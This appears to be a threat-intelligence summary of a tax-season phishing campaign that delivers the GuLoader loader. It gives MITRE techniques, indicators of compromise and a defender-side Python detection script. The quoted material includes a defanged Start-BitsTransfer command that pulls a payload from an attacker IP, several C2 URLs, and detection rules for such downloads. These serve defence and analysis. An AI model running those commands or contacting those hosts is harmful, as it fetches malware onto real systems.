New TACTICAL#OCTOPUS Attack Campaign Targets US Entities with Malware Bundled in Tax-Themed Documents

Keypoints

  • Campaign name and target: A hyper-targeted phishing campaign (TACTICAL#OCTOPUS) aimed at US-based victims during tax season.
  • Primary malware: GuLoader/CloudEyE acts as the delivery loader for additional payloads.
  • Delivery method: Phishing emails with password-protected ZIP attachments containing a .lnk file that launches code, followed by VBScript and PowerShell stagers.
  • Obfuscation and AV evasion: Heavily obfuscated VBScript and PowerShell, with encoded IP addresses and layered code to hinder analysis.
  • Command and control: C2 infrastructure uses multiple URLs and IPs, notably rebrand[.]ly redirects and IPs like 5.8.8[.]100 and 109.206.240[.]67.
  • Impact: In-memory PowerShell/VBScript execution, process hollowing to ieinstal.exe, and data capture (clipboard/keystrokes) with potential persistence.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – ‘A phishing email with a password-protected zip file is delivered to the target using tax-themed lures.’
  • [T1027] Obfuscated/Compressed Files and Information – ‘The VBS script that gets executed … is heavily obfuscated.’
  • [T1059.001] PowerShell – ‘Stage 3: PowerShell execution’ and related obfuscated PowerShell code downloads and executes payloads.
  • [T1059.005] Visual Basic Script (VBS) – ‘The VBS script that gets executed from the shortcut file … is heavily obfuscated.’
  • [T1055.012] Process Hollowing – ‘performs process hollowing to one of two IE utilities, the Internet Explorer Low-MIC Utility Tool, ielowutil.exe or ieinstal.exe.’
  • [T1197] BITS Jobs – ‘Start-BitsTransfer -Source “hxxp://5.8.8[.]100/signal/Traverser.dwp” -Destination …’
  • [T1115] Clipboard Data – ‘ieinstal.exe capturing clipboard data and keystrokes as soon as it started running.’
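A defender-side check for the delivery chain described in the keypoints and the T1566.001/T1197 entries above: a document-looking shortcut (`.pdf.lnk`) arriving as an attachment, then a BITS download whose source is a raw IP or a link shortener. This is an added example, not code from the report or from Securonix; the sample telemetry is constructed, and the benign `updates.example.com` URL is an assumption.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed sample telemetry (not from the report). Defanged values are
# normalised before matching so the same logic works on live or shared data.
SAMPLE_ATTACHMENTS = [
    "FedTaxUS20&21.zip",  # lure archive name from the page
    "FedTaxUS.pdf.lnk",   # double-extension shortcut from the page
    "invoice_2023.pdf",   # assumed benign
]
SAMPLE_CMDLINES = [
    'Start-BitsTransfer -Source "hxxp://5.8.8[.]100/signal/Traverser.dwp" -Destination C:\\Users\\Public\\t.dwp',
    'Start-BitsTransfer -Source "hxxps://rebrand[.]ly/spf5wcc" -Destination C:\\Users\\Public\\a.bin',
    'Start-BitsTransfer -Source "https://updates.example.com/patch.msi" -Destination C:\\Temp\\patch.msi',  # assumed benign
]

DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", re.IGNORECASE)
BITS_SOURCE = re.compile(r"Start-BitsTransfer\b.*?-Source\s+\"?([^\s\"]+)", re.IGNORECASE)
RAW_IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
SHORTENERS = {"rebrand.ly"}  # link shortener named on the page


def refang(value: str) -> str:
    """Turn hxxp:// and [.] notation back into a parseable URL."""
    return value.replace("hxxp", "http").replace("[.]", ".")


def check_attachment(name: str) -> Optional[str]:
    """Flag shortcut files disguised with a document extension."""
    if DOUBLE_EXT_LNK.search(name):
        return "double-extension .lnk (document-looking shortcut)"
    return None


def check_cmdline(cmd: str) -> Optional[str]:
    """Flag Start-BitsTransfer sources that are raw IPs or shortener domains."""
    m = BITS_SOURCE.search(cmd)
    if not m:
        return None
    host = (urlparse(refang(m.group(1))).hostname or "").lower()
    if RAW_IPV4.match(host):
        return f"BITS download from raw IP {host}"
    if host in SHORTENERS:
        return f"BITS download via link shortener {host}"
    return None


def scan(attachments, cmdlines):
    """Return (event, reason) pairs for every record that trips a rule."""
    findings = [(a, r) for a in attachments if (r := check_attachment(a))]
    findings += [(c, r) for c in cmdlines if (r := check_cmdline(c))]
    return findings


if __name__ == "__main__":
    for event, reason in scan(SAMPLE_ATTACHMENTS, SAMPLE_CMDLINES):
        print(f"[ALERT] {reason}: {event}")
```

Both rules are heuristics meant to raise a triage alert, not to block on their own; tune the extension list and shortener set to your environment.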

Indicators of Compromise

  • [IP] C2 IP addresses – 5.8.8.100, 109.206.240.67
  • [Domain] C2 domains/redirects – rebrand[.]ly, goodisgood[.]ru:1977
  • [URL] Example C2/redirect URLs – hxxp://109.206.240[.]67/oy/; hxxps://rebrand[.]ly/spf5wcc; hxxps://rebrand[.]ly/uvhzh3f
  • [File Hash] Lure and payload binaries – 3fc89d5e3e55c0942c6093eef47d87da6c52d6c459a1ad385ae425bd70863b42; 6a45856a160185b57a2e0c059f7eced75d3117a2ead0d75c649b50d9077bdf7f; 3a76d26eb6d4267c47730b002111153f17deb9ae39bbaedacc1caa7c49d1447e; 4d0ebfef45b40e93ec400103685032aadcb2f3427a8a2faa9a70db31bd7e81eb
  • [File Hash] Additional sample files – 29201f916b42e013f24a8a0b2543c25ec04e119b4d0969ddd8aff696f84af7ee; de78ba7cedda5de72f399a0bd7b597e880ebd517144bbeb2dd0a4e12d353d749; fd90d38b7ba7a28b3416c917f8e1f1a670e861fecb9d7402b1aea76ac380589a; 7c5a0ee020e8fb14be5955ee7231191b61f3e077edf638304b046f7d780663bc
  • [File] Notable filenames – FedTaxUS.pdf.lnk; FedTaxUS20&21.zip; Sinsring Lnningsraadenes.exe; JHNGLE8879.zip; SharonYarbrough.zip; WATPCSP.dll

Read more: https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/